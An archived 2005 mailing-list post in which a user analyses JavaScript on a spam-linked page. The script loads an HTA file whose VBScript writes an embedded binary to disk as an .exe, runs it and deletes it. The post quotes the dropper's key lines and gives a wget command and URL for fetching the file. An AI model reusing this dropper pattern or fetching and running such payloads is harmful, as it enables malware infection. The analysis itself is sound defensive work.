--On Thursday, September 01, 2005 11:50 AM -0700 Kenneth Porter
<[EMAIL PROTECTED]> wrote:
Interesting. The link in that spam leads to a page containing just a news
article with the same text, and a "next article" link. But inspection of
the page source reveals this bit of JavaScript. Any idea what it does? (I
threw some spaces inside the script tags so hopefully OE users on the
list won't see this run.) Mozilla's JavaScript console complains about
some errors.
Ok, a bit more investigation shows that it tries to load /w.hta from the
same site. This is a vbscript program that attempts to write a "text" file
of some binary and then execute it via the MS media player API's. Smells
like an attempt to infect the target with some virus.
This command can be used to fetch the file for inspection:
wget -nd -c http://nextermest.com/w.hta
The critical bits of code:
Fi="C:\fh4uh.exe"
set NNM=MSmedia.CreateTextFile(Fi, TRUE)
NNM.Write(R)
NNM.Close()
MSplay.Run (Fi),1,TRUE
MSmedia.DeleteFile(Fi)
self.Close
R contains a binary string; its initialization takes up most of the file.
